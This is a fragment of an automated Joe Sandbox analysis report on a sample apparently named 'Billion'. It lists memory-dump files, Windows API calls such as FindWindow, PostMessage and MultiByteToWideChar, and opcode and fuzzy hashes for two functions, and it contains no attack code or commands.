                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                          • Opcode ID: ce06821e2b324a366ad0c66e1e10d1cb4c50b9870f99465076b8f8d3bedcf386
                                                                                                                                                                                                                                                                                                          • Instruction ID: 66fc86ea830a370ac5be2183fa78a7634b9027ffaaca4cd1a96da222bfd80fd0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce06821e2b324a366ad0c66e1e10d1cb4c50b9870f99465076b8f8d3bedcf386
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D0A9313813107AE668B330AC0FFD27A209B10B00F104838B305EA4C0CAA0A880C644
                                                                                                                                                                                                                                                                                                          Function 0016C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0016C213
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0016C221
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0016C27C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0851e07f1e95cf7bf0ecdfad317c80a8b1a42b05e64ac41f9e1698f2a4a3ed7b
                                                                                                                                                                                                                                                                                                          • Instruction ID: c8d55d566221f090db204405e6af90702a9666dc63e64d1a9d90916c5512f24b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0851e07f1e95cf7bf0ecdfad317c80a8b1a42b05e64ac41f9e1698f2a4a3ed7b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C411531600206EFDB258FE5CC54ABA7BA5EF15710F25416DFC99AB2A1DB309D21CBE0